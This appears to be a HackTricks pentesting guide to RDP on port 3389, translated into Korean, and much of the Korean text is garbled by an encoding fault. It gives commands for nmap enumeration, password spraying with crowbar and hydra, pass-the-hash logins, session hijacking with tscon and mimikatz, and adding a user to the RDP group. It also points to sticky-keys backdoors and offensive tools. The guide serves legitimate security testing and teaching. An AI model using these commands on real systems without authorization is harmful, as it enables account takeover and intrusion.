# 3389 - Pentesting RDP
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**μ·¨μ½μ νκ° λ° μΉ¨ν¬ ν
μ€νΈλ₯Ό μν μ¦μ μ¬μ© κ°λ₯ν μ€μ **. 20κ° μ΄μμ λꡬ λ° κΈ°λ₯μ μ¬μ©νμ¬ μ΄λμλ μ 체 μΉ¨ν¬ ν
μ€νΈλ₯Ό μ€νν μ μμΌλ©°, μ΄λ νμμμ λ³΄κ³ μ μ΄λ₯΄κΈ°κΉμ§ κ°λ₯ν©λλ€. μ°λ¦¬λ μΉ¨ν¬ ν
μ€ν°λ₯Ό λ체νμ§ μμΌλ©°, κ·Έλ€μ΄ λ κΉμ΄ νκ³ λ€κ³ , μμ ν°λ¨λ¦¬κ³ , μ¬λ―Έλ₯Ό λλ μ μλλ‘ λ§μΆ€ν λꡬ, νμ§ λ° μ
μ© λͺ¨λμ κ°λ°ν©λλ€.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## κΈ°λ³Έ μ 보
Microsoftμμ κ°λ°ν **μ격 λ°μ€ν¬ν± νλ‘ν μ½**(**RDP**)μ λ€νΈμν¬λ₯Ό ν΅ν΄ μ»΄ν¨ν° κ°μ κ·Έλν½ μΈν°νμ΄μ€ μ°κ²°μ κ°λ₯νκ² νλλ‘ μ€κ³λμμ΅λλ€. μ΄λ¬ν μ°κ²°μ μ€μ νκΈ° μν΄ μ¬μ©μλ **RDP** ν΄λΌμ΄μΈνΈ μννΈμ¨μ΄λ₯Ό μ¬μ©νκ³ , λμμ μ격 μ»΄ν¨ν°λ **RDP** μλ² μννΈμ¨μ΄λ₯Ό μ΄μν΄μΌ ν©λλ€. μ΄ μ€μ μ μ격 μ»΄ν¨ν°μ λ°μ€ν¬ν± νκ²½μ μννκ² μ μ΄νκ³ μ κ·Όν μ μκ² νμ¬, λ³Έμ§μ μΌλ‘ κ·Έ μΈν°νμ΄μ€λ₯Ό μ¬μ©μμ λ‘컬 μ₯μΉλ‘ κ°μ Έμ΅λλ€.
**κΈ°λ³Έ ν¬νΈ:** 3389
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
```
## μ΄κ±°
### μλ
{% code overflow="wrap" %}
```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4
```
{% endcode %}
μ¬μ© κ°λ₯ν μνΈν λ° DoS μ·¨μ½μ±μ νμΈνκ³ (μλΉμ€μ DoSλ₯Ό μ λ°νμ§ μμ) NTLM Windows μ 보(λ²μ )λ₯Ό μ»μ΅λλ€.
### [λ¬΄μ°¨λ³ λμ
곡격](../generic-methodologies-and-resources/brute-force.md#rdp)
**μ£ΌμνμΈμ, κ³μ μ΄ μ κΈΈ μ μμ΅λλ€**
### **λΉλ°λ²νΈ μ€νλ μ΄ κ³΅κ²©**
**μ£ΌμνμΈμ, κ³μ μ΄ μ κΈΈ μ μμ΅λλ€**
```bash
# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
```
### μλ €μ§ μ격 μ¦λͺ
/ν΄μλ‘ μ°κ²°νκΈ°
```bash
rdesktop -u
rdesktop -d -u -p
xfreerdp [/d:domain] /u: /p: /v:
xfreerdp [/d:domain] /u: /pth: /v: #Pass the hash
```
### RDP μλΉμ€μ λν μλ €μ§ μ격 μ¦λͺ
νμΈ
impacketμ rdp\_check.pyλ₯Ό μ¬μ©νλ©΄ μΌλΆ μ격 μ¦λͺ
μ΄ RDP μλΉμ€μ λν΄ μ ν¨νμ§ νμΈν μ μμ΅λλ€:
```bash
rdp_check /:@
```
**μ·¨μ½μ νκ° λ° μΉ¨ν¬ ν
μ€νΈλ₯Ό μν μ¦μ μ¬μ© κ°λ₯ν μ€μ **. 20κ° μ΄μμ λꡬ λ° κΈ°λ₯μ μ¬μ©νμ¬ μ΄λμλ μ 체 μΉ¨ν¬ ν
μ€νΈλ₯Ό μ€ννμΈμ. μ°λ¦¬λ μΉ¨ν¬ ν
μ€ν°λ₯Ό λ체νμ§ μμ΅λλ€ - κ·Έλ€μ΄ λ κΉμ΄ νκ³ λ€κ³ , μμ ν°λ¨λ¦¬κ³ , μ¬λ―Έλ₯Ό λλ μ μλλ‘ λ§μΆ€ν λꡬ, νμ§ λ° μ
μ© λͺ¨λμ κ°λ°ν©λλ€.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **곡격**
### μΈμ
νμ·¨
**SYSTEM κΆν**μΌλ‘ **μ΄λ€ μ¬μ©μμ μν΄μλ μ΄λ¦° RDP μΈμ
μ** μ κ·Όν μ μμΌλ©°, μμ μμ λΉλ°λ²νΈλ₯Ό μ νμκ° μμ΅λλ€.
**μ΄λ¦° μΈμ
κ°μ Έμ€κΈ°:**
```
query user
```
**μ νν μΈμ
μ λν μ κ·Ό**
```bash
tscon /dest:
```
μ΄μ μ νν RDP μΈμ
μ λ€μ΄κ°κ² λλ©°, Windows λꡬμ κΈ°λ₯λ§μ μ¬μ©νμ¬ μ¬μ©μλ₯Ό κ°μ₯νκ² λ©λλ€.
**μ€μ**: νμ± RDP μΈμ
μ μ κ·Όνλ©΄ ν΄λΉ μΈμ
μ μ¬μ© μ€μΈ μ¬μ©μκ° κ°μ λ‘ λ‘κ·Έμμλ©λλ€.
νλ‘μΈμ€λ₯Ό λ€ννμ¬ λΉλ°λ²νΈλ₯Ό μ»μ μ μμ§λ§, μ΄ λ°©λ²μ ν¨μ¬ λΉ λ₯΄λ©° μ¬μ©μμ κ°μ λ°μ€ν¬νκ³Ό μνΈμμ©ν μ μκ² ν΄μ€λλ€ (λΉλ°λ²νΈκ° λμ€ν¬μ μ μ₯λμ§ μμ λ©λͺ¨μ₯, λ€λ₯Έ λ¨Έμ μμ μ΄λ¦° λ€λ₯Έ RDP μΈμ
λ±...).
#### **Mimikatz**
μ΄ μμ
μ μννκΈ° μν΄ mimikatzλ₯Ό μ¬μ©ν μλ μμ΅λλ€:
```bash
ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session
```
### Sticky-keys & Utilman
μ΄ κΈ°μ μ **stickykeys** λλ **utilman**κ³Ό κ²°ν©νλ©΄ μΈμ λ μ§ κ΄λ¦¬ CMDμ λͺ¨λ RDP μΈμ
μ μ κ·Όν μ μμ΅λλ€.
μ΄ κΈ°μ μ€ νλλ‘ λ°±λμ΄κ° μ€μ λ RDPλ₯Ό κ²μν μ μμ΅λλ€: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
### RDP Process Injection
λ€λ₯Έ λλ©μΈμμ λλ **λ λμ κΆνμΌλ‘ RDPλ₯Ό ν΅ν΄ λ‘κ·ΈμΈν** μ¬μ©μκ° **λΉμ μ΄ κ΄λ¦¬μ**μΈ PCμ μ μνλ©΄, κ·Έμ **RDP μΈμ
νλ‘μΈμ€**μ λΉμ μ λΉμ½μ **μ£Όμ
**νκ³ κ·Έλ‘ νλν μ μμ΅λλ€:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
{% endcontent-ref %}
### Adding User to RDP group
```bash
net localgroup "Remote Desktop Users" UserLoginName /add
```
## Automatic Tools
* [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn)
**AutoRDPwn**λ Microsoft Windows μ»΄ν¨ν°μμ **Shadow** 곡격μ μλννκΈ° μν΄ μ£Όλ‘ μ€κ³λ Powershellλ‘ μμ±λ ν¬μ€νΈ μ΅μ€νλ‘μ νλ μμν¬μ
λλ€. μ΄ μ·¨μ½μ (λ§μ΄ν¬λ‘μννΈμμ κΈ°λ₯μΌλ‘ λμ΄λ¨)μ μ격 곡격μκ° **νΌν΄μμ λμ μμ΄ κ·Έμ λ°μ€ν¬νμ λ³Ό μ μκ²** νλ©°, μ¬μ§μ΄ μ΄μ 체μ μ체μ λꡬλ₯Ό μ¬μ©νμ¬ νμμ λ°λΌ μ΄λ₯Ό μ μ΄ν μ μκ² ν©λλ€.
* [**EvilRDP**](https://github.com/skelsec/evilrdp)
* λͺ
λ Ήμ€μμ μλνλ λ°©μμΌλ‘ λ§μ°μ€μ ν€λ³΄λ μ μ΄
* λͺ
λ Ήμ€μμ μλνλ λ°©μμΌλ‘ ν΄λ¦½λ³΄λ μ μ΄
* RDPλ₯Ό ν΅ν΄ λμμ λ€νΈμν¬ ν΅μ μ μ λ¬νλ SOCKS νλ‘μ ν΄λΌμ΄μΈνΈμμ μμ±
* νμΌμ μ
λ‘λνμ§ μκ³ λ λμμμ μμμ SHELL λ° PowerShell λͺ
λ Ή μ€ν
* νμΌ μ μ‘μ΄ λμμμ λΉνμ±νλμ΄ μμ΄λ λμμ νμΌμ μ
λ‘λ λ° λ€μ΄λ‘λ
## HackTricks Automatic Commands
```
Protocol_Name: RDP #Protocol Abbreviation if there is one.
Port_Number: 3389 #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.
https://book.hacktricks.xyz/pentesting/pentesting-rdp
Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
**μ·¨μ½μ νκ° λ° μΉ¨ν¬ ν
μ€νΈλ₯Ό μν μ¦μ μ¬μ© κ°λ₯ν μ€μ **. 20κ° μ΄μμ λꡬ λ° κΈ°λ₯μ μ¬μ©νμ¬ μ΄λμλ μ 체 μΉ¨ν¬ ν
μ€νΈλ₯Ό μ€ννμΈμ. μ°λ¦¬λ μΉ¨ν¬ ν
μ€ν°λ₯Ό λ체νμ§ μμ΅λλ€ - μ°λ¦¬λ κ·Έλ€μ΄ λ κΉμ΄ νκ³ λ€κ³ , μμ ν°λ¨λ¦¬κ³ , μ¬λ―Έλ₯Ό λλ μ μλλ‘ λ§μΆ€ν λꡬ, νμ§ λ° μ
μ© λͺ¨λμ κ°λ°ν©λλ€.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks μ§μνκΈ°
* [**ꡬλ
κ³ν**](https://github.com/sponsors/carlospolop) νμΈνκΈ°!
* **π¬ [**Discord κ·Έλ£Ή**](https://discord.gg/hRep4RUj7f) λλ [**ν
λ κ·Έλ¨ κ·Έλ£Ή**](https://t.me/peass)μ μ°Έμ¬νκ±°λ **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**λ₯Ό νλ‘μ°νμΈμ.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) λ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νμ 곡μ νμΈμ.**
{% endhint %}